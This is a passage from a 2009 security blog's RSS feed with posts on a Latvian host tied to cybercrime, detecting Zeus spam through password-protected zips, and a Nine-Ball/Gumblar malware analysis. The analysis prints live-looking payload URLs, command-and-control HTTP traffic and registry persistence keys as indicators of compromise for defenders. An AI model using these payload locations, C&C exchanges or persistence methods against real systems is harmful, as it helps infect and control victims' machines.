<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>4.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Adult traffic is not  welcomed</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>5.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">An account will be deleted without  payout in case of detection of spam or worm traffic</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>6.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">We have been deleting accounts that  are not active for few days</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>7.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Cheaters and hit-boters, please  don’t waste our time, look for other places</span></span></p>
<p class="MsoNormal" style="margin-left: 54pt; text-indent: -18pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;"><span>8.<span style="font-family: Times New Roman; font-size: xx-small;"><span style="font-family: 'Times New Roman'; font-style: normal; font-variant: normal; font-weight: normal; font-size: 7pt; line-height: normal; font-size-adjust: none; font-stretch: normal; -x-system-font: none;"> </span></span></span></span></span><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Payout twice a month, in the  beginning and in the middle of month<br />
Use XXX XXXXXX to contact  us</span></span></p>
<p>Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.</p>
<p>This leads to another  site called installing.cc. This site pays for installing malware onto compromised PCs.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1.png"><img class="alignnone size-medium wp-image-397" title="installing.cc" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/installing1-260x300.png" alt="installing.cc" width="260" height="300" /></a></p>
<p>Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.</p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" title="real host advertisment" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="real host advertisment" width="300" height="296" /></a></p>
<p><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert.png"></a><a href="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1.png"><img class="alignnone size-medium wp-image-398" style="-moz-binding: url(chrome://global/content/bindings/general.xml#asdfzxcv);" title="advert1" src="http://www.martinsecurity.net/wp-content/uploads/2009/07/advert1-300x296.png" alt="advert1" width="300" height="296" /></a></p>
<p>The slides in the flash movie say:</p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Long-live  substitution,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And software  sale,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">Referral  system,</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">And other life  enjoyments</span></span></p>
<p class="MsoNormal" style="margin-left: 36pt;"><span style="font-family: Arial; font-size: x-small;"><span style="font-size: 10pt; font-family: Arial;">For invitation and detailed  information contact us via XXX XXXXXX</span></span></p>
<p>Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them  were used by the former RBN. Real Host represents  a major threat to individuals, business and the safety of the Internet ecosystem.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/31/real-host-latvia-rbn-resurgence-or-clone/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Major Report Coming via HostExploit team</title>
		<link>http://www.martinsecurity.net/2009/07/27/major-report-coming-via-hostexploit-team/</link>
		<comments>http://www.martinsecurity.net/2009/07/27/major-report-coming-via-hostexploit-team/#comments</comments>
		<pubDate>Tue, 28 Jul 2009 01:30:28 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[hostexploit]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=354</guid>
		<description><![CDATA[It&#8217;s been awhile since I posted unfortunately, but it&#8217;s not due to a lack of attacks to talk about!   Some time ago I was approached by the Host Exploit open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together [...]]]></description>
			<content:encoded><![CDATA[<p>It&#8217;s been awhile since I posted unfortunately, but it&#8217;s not due to a lack of attacks to talk about! <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  Some time ago I was approached by the <a title="host exploit" href="http://hostexploit.com/" target="_blank">Host Exploit</a> open source security research group and they asked me if I would help contribute to their efforts. This is the group that put together research that led to the McColo, Atrivo and EST domains take downs. Since I&#8217;m always trying to get the word out on attacks and threats, the answer was quite obvious.</p>
<p>So this means my spare time has been mostly spent contributing to the next major report from the HostExploit team. Look for it in the coming weeks, it&#8217;s going to be very juicy <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/07/27/major-report-coming-via-hostexploit-team/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Finding the Unknown &#8211; Detecting Emailed Malware Waves</title>
		<link>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/</link>
		<comments>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 02:34:59 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Intrusion Detection]]></category>
		<category><![CDATA[Malware scripts and other formats]]></category>
		<category><![CDATA[IDS]]></category>
		<category><![CDATA[instrusion detection]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[wsnpoem]]></category>
		<category><![CDATA[zbot]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=338</guid>
		<description><![CDATA[In a previous post I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.
Another method I&#8217;d like to highlight is looking for [...]]]></description>
			<content:encoded><![CDATA[<p>In a <a href="http://www.martinsecurity.net/2008/11/26/finding-the-unknown-on-your-network/" target="_blank">previous post</a> I discussed using the technique of watching for the transfer of executable files around the network as a method of intrusion detection. This is a great way of discovering machines that were attacked where IDS failed to detect the exploit(s) due to obfuscation.</p>
<p>Another method I&#8217;d like to highlight is looking for password protect zip files. Like the transfer of executables, password protected zips are perfectly legitimate. Lets take Zeus as an example.</p>
<p>Zeus/Zbot/WSNpoem spreads both via web exploits and SPAM runs. In order to get the payload past AV detection, the malware author encrypts the file and provides the password in the body of the message. AV cannot scan within the archive and can only match on a specific signature for the encrypted archive itself.</p>
<p>There was one of these runs earlier this week (June 24th) which is easily detected by a signature that looks for password protected zips. You might think that a signature like this would generate a lot of events, and it does, however it is easy to sort through and find the attacks. The file name used in this attack was &#8220;djellow.zip&#8221;.  A quick search leads us to <a title="Abuse.ch - Zeus" href="http://www.abuse.ch/?p=1576" target="_blank">this article</a> over at abuse.ch.</p>
<p>The messages were sent from a number of IPs, including:</p>
<p>95.25.108.154<br />
95.24.3.119<br />
89.248.207.69<br />
88.227.199.86<br />
86.105.126.142<br />
85.100.177.112<br />
84.92.85.139<br />
84.204.112.15<br />
84.104.97.35<br />
83.5.144.32<br />
78.176.8.64<br />
78.166.216.115<br />
78.161.81.160<br />
78.158.51.103<br />
77.77.15.208<br />
77.255.254.214<br />
76.175.144.40<br />
72.179.5.10<br />
71.124.158.42<br />
209.239.38.24<br />
201.22.7.148<br />
201.15.77.229<br />
201.0.136.67<br />
200.68.63.226<br />
200.56.79.179<br />
190.175.133.38<br />
189.78.200.43<br />
188.47.4.252<br />
187.14.9.68</p>
<p>The two worst offenders are Brazil and Turkey with 5 IPs each.</p>
<table style="border-collapse: collapse; height: 92px;" border="0" cellspacing="2" cellpadding="2" width="808">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">ASN</p>
<p>18881</td>
<td style="width: 85pt;" width="113">IP</p>
<p>201.22.7.148<span> </span></td>
<td style="width: 95pt;" width="126">Prefix</p>
<p>201.22.0.0/18<span> </span></td>
<td style="width: 48pt;" width="64">Country</p>
<p>BR<span> </span></td>
<td style="width: 346pt;" width="461">Description</p>
<p>Global Village Telecom</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">8167</td>
<td><span> </span>201.15.77.229<span> </span></td>
<td><span> </span>201.15.64.0/18<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELESC &#8211; Telecomunicacoes de Santa   Catarina SA</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>201.0.136.67<span> </span></td>
<td><span> </span>201.0.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">27699</td>
<td><span> </span>189.78.200.43<span> </span></td>
<td><span> </span>189.78.0.0/16<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>TELECOMUNICACOES DE SAO PAULO S/A   &#8211; TELESP</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">7738</td>
<td><span> </span>187.14.9.68<span> </span></td>
<td><span> </span>187.14.0.0/19<span> </span></td>
<td><span> </span>BR<span> </span></td>
<td><span> </span>Telecomunicacoes da Bahia S.A.</td>
</tr>
</tbody>
</table>
<table style="border-collapse: collapse; width: 606pt;" border="0" cellspacing="2" cellpadding="2" width="806">
<col style="width: 32pt;" width="42"></col>
<col style="width: 85pt;" width="113"></col>
<col style="width: 95pt;" width="126"></col>
<col style="width: 48pt;" width="64"></col>
<col style="width: 346pt;" width="461"></col>
<tbody>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt; width: 32pt;" width="42" height="17" align="right">9121</td>
<td style="width: 85pt;" width="113"><span> </span>88.227.199.86<span> </span></td>
<td style="width: 95pt;" width="126"><span> </span>88.227.128.0/17<span> </span></td>
<td style="width: 48pt;" width="64"><span> </span>TR<span> </span></td>
<td style="width: 346pt;" width="461"><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>85.100.177.112<span> </span></td>
<td><span> </span>85.100.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.176.8.64<span> </span></td>
<td><span> </span>78.176.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.166.216.115<span> </span></td>
<td><span> </span>78.166.128.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
<tr style="height: 12.75pt;" height="17">
<td style="height: 12.75pt;" height="17" align="right">9121</td>
<td><span> </span>78.161.81.160<span> </span></td>
<td><span> </span>78.161.0.0/17<span> </span></td>
<td><span> </span>TR<span> </span></td>
<td><span> </span>TTNET TTnet Autonomous System</td>
</tr>
</tbody>
</table>
<p>Attacks using password protected zips can now be identified and their sources uncovered without having to rely solely on exploit or attack related signatures. All that&#8217;s needed is a detective hat and knowledge of current threats.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/29/finding-the-unknown-detecting-emailed-malware-waves/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nine-Ball = Gumblar Redux? &#8211; 40,000 websites compromised</title>
		<link>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/</link>
		<comments>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/#comments</comments>
		<pubDate>Wed, 17 Jun 2009 03:24:53 +0000</pubDate>
		<dc:creator>martinse</dc:creator>
				<category><![CDATA[Intelligence]]></category>
		<category><![CDATA[Malware Binaries (exe/dll)]]></category>
		<category><![CDATA[fake antivirus]]></category>
		<category><![CDATA[fake av]]></category>
		<category><![CDATA[gumblar]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[nine-ball]]></category>
		<category><![CDATA[ninetorack.in]]></category>
		<category><![CDATA[rnw.kz]]></category>

		<guid isPermaLink="false">http://www.martinsecurity.net/?p=326</guid>
		<description><![CDATA[My RSS reader alerted me today to another wave of mass website compromises from Web Sense. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.
Summary
This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end [...]]]></description>
			<content:encoded><![CDATA[<p>My RSS reader alerted me today to another wave of mass website compromises from <a title="Nine-Ball Websense" href="http://securitylabs.websense.com/content/Alerts/3421.aspx" target="_blank">Web Sense</a>. Hungry for more information I decided to dig in to reveal the details that, as always, have been left out.</p>
<p><strong>Summary</strong></p>
<p>This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:</p>
<p>Install a socks proxy<br />
Install fake AV (System Security)<br />
Steal FTP credentials<br />
Send SPAM<br />
Redirect search queries</p>
<p>What&#8217;s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I&#8217;m not 100% sure why yet.</p>
<p><strong>Details</strong></p>
<p>Information on Websense&#8217;s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I&#8217;ll probably post another article on these guys shortly.</p>
<p><tt>inetnum:        91.212.65.0 - 91.212.65.255<br />
netname:        EUROHOST-NET<br />
descr:          Eurohost LLC<br />
descr:          Provider Local Registry<br />
country:        UA</tt></p>
<p>This IP hosts many <a href="http://www.robtex.com/ip/91.212.65.133.html" target="_blank">other domains</a> associated with the attack:</p>
<p>sovi.tw<br />
rmi.tw<br />
orep.tw<br />
molo.tw<br />
dmr.tw</p>
<p>When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com <img src='http://www.martinsecurity.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>After using MalZilla to quickly decode the exploit code (discussed in WebSense&#8217;s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] <a href="http://www.virustotal.com/analisis/62254bf6a13a438bc53c0f3745c622c5c1604aa37e4f866036a1e94c35cc68f7-1245193759" target="_blank">[VirusTotal]</a> <a title="nine ball threat expert" href="http://www.threatexpert.com/report.aspx?md5=32b7671aab9a5b8cf17d8eeb0993a266" target="_blank">[Threat Expert]</a>.</p>
<p>A VM of mine was infected and after loading internet explorer the malware lit up and did it&#8217;s thing. I&#8217;ve submitted a few files to VT but to be honest I haven&#8217;t had to much time to investigate to cover everything.</p>
<p><a href="http://www.virustotal.com/analisis/85d86e234c2b4ae30cf7e1a74f2e5ced29ad95dafd48cc7f7b4b4db9ff71870f-1245206431" target="_blank">Virustotal 1</a></p>
<p><a href="http://www.virustotal.com/analisis/e8294fe1c4a1a129278b2f65b490a312cb6834b2e8d1df9bd296550d35a485df-1245203711" target="_blank">Virustotal 2</a></p>
<p><strong>Binary Downloads, Ads and C&amp;C communication</strong></p>
<p>Interesting notes:</p>
<p>User Agent: socks<br />
HTTP server: nginx (commonly used by attackers)<br />
C&amp;C appears to be: trafficshop.tw<br />
Version: 3.15.3<br />
Some of the attacker&#8217;s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;</p>
<p>GET /zub/zc.php?l=US&amp;d=0A91D4B2BEDE419DAD002CB5AF39B158&amp;v=3.15.3&amp;sft=AAAAAAAAA&amp;rvz1=41&amp;rvz2=0002786062 HTTP/1.1</p>
<p>Host: trafficshop.tw<br />
HTTP/1.1 200 OK<br />
Date: Wed, 17 Jun 2009 00:25:41 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 1822<br />
Content-Type: text/html</p>
<p>#U1:http://orep.tw/socks.exe<br />
#U1:http://orep.tw/sever.exe<br />
#U1:http://orep.tw/ic.exe<br />
#U;:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U7:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U?:&lt;br&gt;|ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;|&lt;a href=&#8221;http://www.best-med-shop.com&#8221;&gt;   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   &lt;br&gt;|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    &lt;br&gt;|flawless customer support. New discounts and special offers !       &lt;br&gt;|&lt;/a&gt;|http://www.best-med-shop.com|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%<br />
#U=:FORUM ADVERTISING|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa&#8230;. [/url]|||http://www.best-med-shop.com||&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;%%</p>
<p>GET /zub/zc.php?l=US&amp;d=0A91D4B2BEDE419DAD002CB5AF39B158&amp;v=3.15.3&amp;k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1</p>
<p>Host: trafficshop.tw<br />
HTTP/1.1 200 OK<br />
Date: Wed, 17 Jun 2009 00:26:01 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 251<br />
Content-Type: text/html</p>
<p>#U1:http://orep.tw/socks.exe<br />
#U1:http://orep.tw/sever.exe<br />
#U1:http://orep.tw/ic.exe<br />
Array<br />
(<br />
[0] =&gt; 200704_socks.exe<br />
[1] =&gt; 432128_sever.exe<br />
[2] =&gt; 11264_ic.exe<br />
)<br />
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;<br />
.crc tmpl.</p>
<p>GET /n1.exe HTTP/1.1<br />
User-Agent: Mozilla<br />
Host: miosmschat.com</p>
<p>HTTP/1.1 200 OK<br />
Server: nginx/0.7.59<br />
Date: Tue, 16 Jun 2009 23:34:57 GMT<br />
Content-Type: application/octet-stream<br />
Connection: close<br />
Content-Length: 512830<br />
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT<br />
Accept-Ranges: bytes</p>
<p><strong>Other interesting network traffic</strong></p>
<p>GET /in.php?url=5&amp;affid=02800 HTTP/1.1<br />
Referrer: http://greatmarketingservices.com/<br />
Accept: *//*<br />
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)<br />
Host: greatmarketingservices.com<br />
Connection: Keep-Alive<br />
Cache-Control: no-cache</p>
<p>POST /socks/gate/r.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 125<br />
Cache-Control: no-cache</p>
<p>s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:01 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 29<br />
Content-Type: text/html</p>
<p>iogeelhchqhogmhgggdccnghdqdk</p>
<p>POST /socks/gate/data.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 78<br />
Cache-Control: no-cache</p>
<p>CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460&#8230;ya.ru/5/982HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:04 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 0<br />
Content-Type: text/html</p>
<p>POST /socks/gate/data.php HTTP/1.1<br />
Content-Type: application/x-www-form-urlencoded<br />
User-Agent: socks<br />
Host: trafficshop.tw<br />
Content-Length: 93<br />
Cache-Control: no-cache</p>
<p>CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460&#8230;AAAAAAAACI.050010026000300HTTP/1.1 200 OK</p>
<p>Date: Wed, 17 Jun 2009 00:26:04 GMT<br />
Server: Apache/2<br />
X-Powered-By: PHP/5.2.9<br />
Vary: Accept-Encoding,User-Agent<br />
Content-Length: 50<br />
Content-Type: text/html</p>
<p><strong>Files &amp; Reg Keys</strong></p>
<p>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: &#8220;C:\WINDOWS\sever.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: &#8220;C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: &#8220;C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe&#8221;<br />
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: &#8220;nvbms&#8221;<br />
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: &#8220;C:\WINDOWS\system32\npp\ndisnpp.dll&#8221;</p>
<p>C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)<br />
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)<br />
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)<br />
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)<br />
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)<br />
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc<br />
C:\WINDOWS\system32\cxilanls<br />
C:\WINDOWS\system32\nh4g.bbv<br />
C:\WINDOWS\system32\nvbms.dll<br />
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)<br />
C:\WINDOWS\system32\sgr3.ge<br />
C:\WINDOWS\system32\SOCKET2.DLL<br />
C:\WINDOWS\system32\SOCKET2w.DLL<br />
C:\WINDOWS\system32\SPORDER.DLL<br />
C:\WINDOWS\system32\user32.DLL<br />
C:\WINDOWS\system32\vrur<br />
C:\WINDOWS\sever.exe<br />
C:\WINDOWS\socks.exe (socks proxy)</p>
<p><strong>Other notable behavior</strong></p>
<p>The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it&#8217;s presence by deleting various reg keys and the winpcap uninstaller.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.martinsecurity.net/2009/06/16/nine-ball-gumblar-redux-40000-websites-compromised/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
